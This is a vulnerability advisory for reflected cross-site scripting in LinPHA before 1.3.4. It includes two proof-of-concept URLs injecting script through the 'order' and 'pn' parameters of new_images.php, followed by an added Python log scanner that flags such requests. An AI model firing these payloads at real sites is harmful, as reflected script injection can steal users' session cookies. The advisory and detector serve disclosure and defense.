source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E
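
Added example, not part of the original advisory or of LinPHA's code: a Python check that scans web access-log lines for requests to new_images.php whose order or pn value decodes to HTML metacharacters, as in the two URLs above. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TARGET_SCRIPT = "new_images.php"   # script named in the advisory
WATCHED_PARAMS = {"order", "pn"}   # parameters named in the advisory
# Characters that let a reflected value close an attribute or open a tag.
HTML_META = re.compile(r"[<>\"']")
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; only the payload in the first one is from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2009:12:00:01 +0000] "GET /test/linpha-1.3.2/'
    'new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [10/Apr/2009:12:00:05 +0000] "GET /test/linpha-1.3.2/'
    'new_images.php?pn=2&order=date HTTP/1.1" 200 4988',
    '192.0.2.12 - - [10/Apr/2009:12:00:09 +0000] "GET /test/linpha-1.3.2/'
    'new_images.php?pn=%2522%253Cb%253E HTTP/1.1" 200 5011',
    '192.0.2.13 - - [10/Apr/2009:12:00:12 +0000] "GET /test/linpha-1.3.2/'
    'index.php?order=%3Cb%3E HTTP/1.1" 200 300',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return the sorted watched parameters whose value holds HTML metacharacters."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/" + TARGET_SCRIPT):
        return []
    hits = set()
    # parse_qsl decodes once; fully_decode handles any further encoding layers.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and HTML_META.search(fully_decode(value)):
            hits.add(name)
    return sorted(hits)
```

A hit only shows that a request carried markup in one of the two parameters; whether it was reflected depends on the installed version, and the advisory states that versions prior to LinPHA 1.3.4 are vulnerable.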